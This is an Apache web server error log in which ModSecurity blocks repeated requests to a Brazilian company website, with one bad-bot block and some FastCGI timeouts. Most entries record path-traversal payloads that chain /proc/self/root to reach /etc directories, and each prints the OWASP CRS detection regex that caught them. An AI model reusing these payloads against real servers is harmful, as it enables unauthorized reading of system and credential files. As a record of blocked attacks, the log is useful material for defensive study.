[Thu Mar 19 11:17:50.529108 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:58432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFjgbLMZ6AikZjR9VgVwAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:17:55.121869 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52616] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:18:02.411702 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:58446] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFmuyqAr6etmhZHNpjpwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:18:18.129798 2026] [proxy_fcgi:error] [pid 27403:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53252] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:18:20.103300 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.243.128:44874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFrF_V7PWP6ixUYl6_pQAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:18:34.512335 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.241.31:38542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFuhkFeYa1D6dYQnDzygAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:18:39.855084 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.241.31:57566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwFvxkFeYa1D6dYQnDzzQAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:18:40.125805 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53790] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:19:00.819738 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:57044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwF1OyqAr6etmhZHNpjzgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:19:02.056275 2026] [proxy_fcgi:error] [pid 19093:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54336] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:19:10.281889 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.243.128:50096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwF3hkFeYa1D6dYQnDz3QAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:19:13.150659 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:57572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwF4da6ubjKNq_cu4ZXegAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:19:14.659936 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:42980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwF4gbLMZ6AikZjR9VgmgAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:19:16.395549 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.243.128:42996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwF5F_V7PWP6ixUYl6_zAAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:19:25.122037 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55012] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:19:25.455389 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:43002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwF7eoXxyEfFpUF8f8RdQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:19:34.368828 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.228.61:56334] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwF9V_V7PWP6ixUYl6_0wAAAo8"]
[Thu Mar 19 11:19:49.149782 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55510] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:20:08.496691 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.243.128:60540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGGAbLMZ6AikZjR9VgtAAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:20:12.129822 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55992] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:20:14.792189 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.243.128:47182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGHl_V7PWP6ixUYl6_4gAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:20:20.053364 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:59330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGJPu8EFLIOrSqIpuqDwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:20:36.057829 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:56540] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:20:38.907136 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:59346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGNta6ubjKNq_cu4ZXowAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:20:47.128250 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:43750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGP8df6f5d65gmYZR6hwAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:20:50.825755 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.243.128:59446] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGQl_V7PWP6ixUYl6_9QAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:20:59.057853 2026] [proxy_fcgi:error] [pid 19093:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57080] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:21:01.257880 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.241.31:56648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGTV_V7PWP6ixUYl6_-wAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:21:05.759101 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:59460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGUda6ubjKNq_cu4ZXuQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:21:07.041819 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.241.31:58948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGUwbLMZ6AikZjR9Vg0wAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:21:09.851036 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:35908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGVeyqAr6etmhZHNpkBQAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:21:12.395695 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:35918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 